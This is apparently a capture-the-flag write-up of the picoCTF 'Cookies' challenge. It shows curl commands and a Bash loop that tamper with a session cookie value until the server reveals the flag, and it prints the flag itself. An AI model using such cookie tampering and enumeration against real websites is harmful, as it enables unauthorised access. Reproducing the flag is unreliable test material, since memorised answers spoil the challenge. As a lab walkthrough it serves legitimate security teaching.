Cookies

2 minutes to read

We are given a website that asks for a cookie:

Red

Looking at the developer tools, we can see that we have a cookie name=-1. If we send snickerdoodle as the placeholder suggests, the cookie will change to name=0:

Blue

Let’s modify the value of the cookie using curl and show only the message:

$ curl mercury.picoctf.net:27177/check -sH 'Cookie: name=0' | grep -oE '<b>.*?</b>'  
<b>I love snickerdoodle cookies!</b>

Now let’s use a loop in Bash to see if something change if we use another value as cookie:

$ for i in {0..20}; do echo -n "$i: "; curl mercury.picoctf.net:27177/check -sH "Cookie: name=$i" | grep -oE '<b>.*?</b>'; done  
0: <b>I love snickerdoodle cookies!</b>
1: <b>I love chocolate chip cookies!</b>
2: <b>I love oatmeal raisin cookies!</b>
3: <b>I love gingersnap cookies!</b>
4: <b>I love shortbread cookies!</b>
5: <b>I love peanut butter cookies!</b>
6: <b>I love whoopie pie cookies!</b>
7: <b>I love sugar cookies!</b>
8: <b>I love molasses cookies!</b>
9: <b>I love kiss cookies!</b>
10: <b>I love biscotti cookies!</b>
11: <b>I love butter cookies!</b>
12: <b>I love spritz cookies!</b>
13: <b>I love snowball cookies!</b>
14: <b>I love drop cookies!</b>
15: <b>I love thumbprint cookies!</b>
16: <b>I love pinwheel cookies!</b>
17: <b>I love wafer cookies!</b>
18: <b>Flag</b>
19: <b>I love macaroon cookies!</b>
20: <b>I love fortune cookies!</b>

Nice, we see that name=18 will show the flag:

$ curl mercury.picoctf.net:27177/check -sH 'Cookie: name=18' | grep -oE 'picoCTF{.*?}'  
picoCTF{3v3ry1_l0v3s_c00k135_064663be}